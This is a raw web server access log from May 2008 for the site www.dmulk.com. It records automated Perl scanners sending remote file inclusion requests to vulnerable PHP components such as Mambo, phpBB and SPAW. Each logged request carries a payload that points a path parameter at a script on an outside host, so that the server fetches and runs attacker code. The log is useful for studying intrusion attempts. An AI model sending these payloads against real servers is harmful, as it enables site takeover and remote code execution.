208.116.44.60 - - [04/May/2008:13:05:45 -0700] "GET /logs/access_080321.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.105.42 - - [04/May/2008:13:05:46 -0700] "GET /logs/access_071116.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.105.42 - - [04/May/2008:13:05:46 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.60 - - [04/May/2008:13:05:46 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.105.42 - - [04/May/2008:13:05:46 -0700] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.60 - - [04/May/2008:13:05:47 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
83.19.144.26 - - [04/May/2008:13:05:49 -0700] "GET /logs/access_080131.log/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [04/May/2008:13:05:50 -0700] "GET /config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
67.19.105.42 - - [04/May/2008:13:05:50 -0700] "GET /logs/access_071118.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.60 - - [04/May/2008:13:05:51 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
83.19.144.26 - - [04/May/2008:13:05:51 -0700] "GET /logs/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
208.116.44.60 - - [04/May/2008:13:05:51 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
83.19.144.26 - - [04/May/2008:13:05:59 -0700] "GET /logs/access_080119.log/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.219.101.32 - - [04/May/2008:13:06:02 -0700] "GET /logs/access_080321.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.219.101.32 - - [04/May/2008:13:06:02 -0700] "GET /logs/access_080321.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.105.42 - - [04/May/2008:13:06:03 -0700] "GET /logs/access_071118.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.219.101.32 - - [04/May/2008:13:06:05 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.219.101.32 - - [04/May/2008:13:06:05 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.89.27.236 - - [04/May/2008:13:06:24 -0700] "GET /logs/access_080215.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.239.170.75 - - [04/May/2008:13:06:38 -0700] "GET /logs/access_071118.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.35.4.200 - - [04/May/2008:13:06:49 -0700] "GET /logs/access_071218.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.35.4.200 - - [04/May/2008:13:06:50 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.35.4.200 - - [04/May/2008:13:06:50 -0700] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.8.217.2 - - [04/May/2008:13:07:01 -0700] "GET /logs/access.log//trans/trans.php?trans=eng&page=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
204.8.217.2 - - [04/May/2008:13:07:01 -0700] "GET //trans/trans.php?trans=eng&page=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
204.8.217.2 - - [04/May/2008:13:07:01 -0700] "GET /logs//trans/trans.php?trans=eng&page=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.239.170.75 - - [04/May/2008:13:07:02 -0700] "GET /logs/access_080215.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.239.170.75 - - [04/May/2008:13:07:03 -0700] "GET /logs/access_080215.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.8.217.2 - - [04/May/2008:13:07:03 -0700] "GET /logs/access.log//trans/trans.php?trans=eng&page=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
204.8.217.2 - - [04/May/2008:13:07:03 -0700] "GET //trans/trans.php?trans=eng&page=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
204.8.217.2 - - [04/May/2008:13:07:04 -0700] "GET /logs//trans/trans.php?trans=eng&page=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.74.9.26 - - [04/May/2008:13:07:07 -0700] "GET /logs/access.log/////?mosConfig_absolute_path=http://www.countryall.altervista.org/php5/431242/index.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.51.25.186 - - [04/May/2008:13:07:07 -0700] "GET /logs/access_071116.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.25.186 - - [04/May/2008:13:07:08 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.25.186 - - [04/May/2008:13:07:08 -0700] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.197.230.150 - - [04/May/2008:13:07:09 -0700] "GET /logs/access.log//trans/trans.php?trans=eng&page=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.197.230.150 - - [04/May/2008:13:07:09 -0700] "GET /logs/access.log//trans/trans.php?trans=eng&page=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.197.230.150 - - [04/May/2008:13:07:09 -0700] "GET //trans/trans.php?trans=eng&page=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.197.230.150 - - [04/May/2008:13:07:09 -0700] "GET /logs//trans/trans.php?trans=eng&page=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.197.230.150 - - [04/May/2008:13:07:10 -0700] "GET //trans/trans.php?trans=eng&page=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.197.230.150 - - [04/May/2008:13:07:11 -0700] "GET /logs//trans/trans.php?trans=eng&page=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.197.230.150 - - [04/May/2008:13:07:11 -0700] "GET /logs/access.log//trans/trans.php?trans=eng&page=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.197.230.150 - - [04/May/2008:13:07:11 -0700] "GET //trans/trans.php?trans=eng&page=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.197.230.150 - - [04/May/2008:13:07:12 -0700] "GET /logs//trans/trans.php?trans=eng&page=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.105.42 - - [04/May/2008:13:07:17 -0700] "GET /logs/access_071118.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.197.230.150 - - [04/May/2008:13:07:22 -0700] "GET /logs/access.log//trans/trans.php?trans=eng&page=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.197.230.150 - - [04/May/2008:13:07:22 -0700] "GET //trans/trans.php?trans=eng&page=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.197.230.150 - - [04/May/2008:13:07:23 -0700] "GET /logs//trans/trans.php?trans=eng&page=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
83.133.127.44 - - [04/May/2008:13:07:47 -0700] "GET /logs/access.log//trans/trans.php?trans=eng&page=http://www.snd.fr/upload/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.133.127.44 - - [04/May/2008:13:07:47 -0700] "GET //trans/trans.php?trans=eng&page=http://www.snd.fr/upload/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.133.127.44 - - [04/May/2008:13:07:48 -0700] "GET /logs//trans/trans.php?trans=eng&page=http://www.snd.fr/upload/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.198.9.203 - - [04/May/2008:13:07:52 -0700] "GET /logs/access_071116.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.198.9.203 - - [04/May/2008:13:07:53 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.198.9.203 - - [04/May/2008:13:07:53 -0700] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.219.101.32 - - [04/May/2008:13:07:56 -0700] "GET /logs/access_080321.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.18.105.82 - - [04/May/2008:13:07:58 -0700] "GET /logs/access_071216.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.105.82 - - [04/May/2008:13:07:58 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.105.82 - - [04/May/2008:13:07:58 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.219.101.32 - - [04/May/2008:13:08:03 -0700] "GET /logs/access_080321.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.219.101.32 - - [04/May/2008:13:08:05 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
66.219.101.32 - - [04/May/2008:13:08:06 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.219.101.32 - - [04/May/2008:13:08:12 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
66.219.101.32 - - [04/May/2008:13:08:12 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.35.4.200 - - [04/May/2008:13:08:12 -0700] "GET /logs/access_071118.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:13:08:37 -0700] "GET /logs/access_071104.log//genlib.php?cms[tngpath]=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:13:08:37 -0700] "GET //genlib.php?cms[tngpath]=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:13:08:37 -0700] "GET /logs//genlib.php?cms[tngpath]=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.73.146.54 - - [04/May/2008:13:08:38 -0700] "GET /logs/access_071216.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.73.146.54 - - [04/May/2008:13:08:38 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.73.146.54 - - [04/May/2008:13:08:38 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.246.154.12 - - [04/May/2008:13:08:39 -0700] "GET /logs/access_071216.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.246.154.12 - - [04/May/2008:13:08:39 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.246.154.12 - - [04/May/2008:13:08:39 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.73.146.54 - - [04/May/2008:13:08:40 -0700] "GET /logs/access_071218.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.73.146.54 - - [04/May/2008:13:08:40 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.73.146.54 - - [04/May/2008:13:08:40 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.73.146.54 - - [04/May/2008:13:08:47 -0700] "GET /logs/access_071218.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.73.146.54 - - [04/May/2008:13:08:47 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.73.146.54 - - [04/May/2008:13:08:47 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.19.144.26 - - [04/May/2008:13:08:54 -0700] "GET /logs/access_080131.log/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [04/May/2008:13:08:55 -0700] "GET /config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [04/May/2008:13:08:55 -0700] "GET /logs/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.175.248.213 - - [04/May/2008:13:08:56 -0700] "GET /logs//admin.php?include_path=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.8.217.2 - - [04/May/2008:13:08:56 -0700] "GET /logs/access_080302.log//trans/trans.php?trans=eng&page=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
83.175.248.213 - - [04/May/2008:13:08:57 -0700] "GET //admin.php?include_path=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.121.94.156 - - [04/May/2008:13:08:59 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://r0xshock.90megs.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.94.156 - - [04/May/2008:13:09:00 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://r0xshock.90megs.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.232.161.40 - - [04/May/2008:13:09:01 -0700] "GET /logs/access_080218.log//components/com_simpleboard/image_upload.php?sbp=http://h1.ripway.com/berek/papi/mami/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
91.121.64.29 - - [04/May/2008:13:09:02 -0700] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.121.64.29 - - [04/May/2008:13:09:02 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.17.101.27 - - [04/May/2008:13:09:02 -0700] "GET /logs/access_071216.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
131.128.169.79 - - [04/May/2008:13:09:02 -0700] "GET /logs/access_071216.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.94.156 - - [04/May/2008:13:09:02 -0700] "GET /logs/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://r0xshock.90megs.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.17.101.27 - - [04/May/2008:13:09:02 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.27 - - [04/May/2008:13:09:02 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
131.128.169.79 - - [04/May/2008:13:09:02 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.94.156 - - [04/May/2008:13:09:02 -0700] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://r0xshock.90megs.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
131.128.169.79 - - [04/May/2008:13:09:02 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.105.42 - - [04/May/2008:13:09:03 -0700] "GET /logs/access_071218.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.105.42 - - [04/May/2008:13:09:03 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.105.42 - - [04/May/2008:13:09:03 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.51.25.186 - - [04/May/2008:13:09:05 -0700] "GET /logs/access_071118.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.154.74 - - [04/May/2008:13:09:08 -0700] "GET /logs/access_071218.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.9.154.74 - - [04/May/2008:13:09:08 -0700] "GET /logs/access_071218.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.9.154.74 - - [04/May/2008:13:09:08 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.9.154.74 - - [04/May/2008:13:09:08 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.9.154.74 - - [04/May/2008:13:09:08 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.9.154.74 - - [04/May/2008:13:09:08 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.18.105.82 - - [04/May/2008:13:09:10 -0700] "GET /logs/access_071218.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.105.82 - - [04/May/2008:13:09:11 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.105.82 - - [04/May/2008:13:09:11 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
